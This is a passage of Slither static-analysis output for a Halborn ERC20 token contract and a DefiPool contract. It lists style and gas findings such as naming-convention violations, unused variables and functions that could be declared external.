Function Halborn.EmergencyDestroy(address) (MyToken.sol#30-33) is not in mixedCase

Parameter Halborn.EmergencyDestroy(address)._to (MyToken.sol#30) is not in mixedCase

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#conformance-to-solidity-naming-conventions

Halborn.constructor() (MyToken.sol#13-15) uses literals with too many digits:

- _mint(msg.sender,10000000000 * 10 ** decimals()) (MyToken.sol#14)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#too-many-digits

DefiPool.allowed (HalbornPool.sol#27) is never used in DefiPool (HalbornPool.sol#20-134)

Halborn._balances (MyToken.sol#12) is never used in Halborn (MyToken.sol#9-34)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#unused-state-variable

transfer(address,uint256) should be declared external:

- DefiPool.transfer(address,uint256) (HalbornPool.sol#32-37)

deposit(uint256,address) should be declared external:

- DefiPool.deposit(uint256,address) (HalbornPool.sol#82-94)

withdraw(address) should be declared external:

- DefiPool.withdraw(address) (HalbornPool.sol#100-119)

getContractBalance() should be declared external:

- DefiPool.getContractBalance() (HalbornPool.sol#124-129)

EmergencyWithraw(address,address,uint256) should be declared external:

- DefiPool.EmergencyWithraw(address,address,uint256) (HalbornPool.sol#131-133)

pause() should be declared external:

- Halborn.pause() (MyToken.sol#16-18)

unpause() should be declared external:

- Halborn.unpause() (MyToken.sol#20-22)

mint(address,uint256) should be declared external:

- Halborn.mint(address,uint256) (MyToken.sol#24-26)

transferbyOwner(address,address,uint256) should be declared external:

- Halborn.transferbyOwner(address,address,uint256) (MyToken.sol#27-29)

EmergencyDestroy(address) should be declared external:

- Halborn.EmergencyDestroy(address) (MyToken.sol#30-33)

renounceOwnership() should be declared external:

- Ownable.renounceOwnership() (openzeppelin/contracts/access/Ownable.sol#54-56)

transferOwnership(address) should be declared external:

- Ownable.transferOwnership(address) (openzeppelin/contracts/access/Ownable.sol#62-65)

name() should be declared external:

- ERC20.name() (openzeppelin/contracts/token/ERC20/ERC20.sol#62-64)

symbol() should be declared external:

- ERC20.symbol() (openzeppelin/contracts/token/ERC20/ERC20.sol#70-72)

totalSupply() should be declared external:

- ERC20.totalSupply() (openzeppelin/contracts/token/ERC20/ERC20.sol#94-96)

balanceOf(address) should be declared external:

- ERC20.balanceOf(address) (openzeppelin/contracts/token/ERC20/ERC20.sol#101-103)

transfer(address,uint256) should be declared external:

- ERC20.transfer(address,uint256) (openzeppelin/contracts/token/ERC20/ERC20.sol#113-116)

approve(address,uint256) should be declared external:

- ERC20.approve(address,uint256) (openzeppelin/contracts/token/ERC20/ERC20.sol#132-135)

transferFrom(address,address,uint256) should be declared external:

- ERC20.transferFrom(address,address,uint256) (openzeppelin/contracts/token/ERC20/ERC20.sol#150-164)

increaseAllowance(address,uint256) should be declared external:

- ERC20.increaseAllowance(address,uint256) (openzeppelin/contracts/token/ERC20/ERC20.sol#178-181)

decreaseAllowance(address,uint256) should be declared external:

- ERC20.decreaseAllowance(address,uint256) (openzeppelin/contracts/token/ERC20/ERC20.sol#197-205)

burn(uint256) should be declared external:

- ERC20Burnable.burn(uint256) (openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol#20-22)

burnFrom(address,uint256) should be declared external:

- ERC20Burnable.burnFrom(address,uint256) (openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol#35-42)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#public-function-that-could-be-declared-external

HalbornPool.sol analyzed (11 contracts with 77 detectors), 54 result(s) found

Static Analysis: MyTokens.sol

$ slither MyToken.sol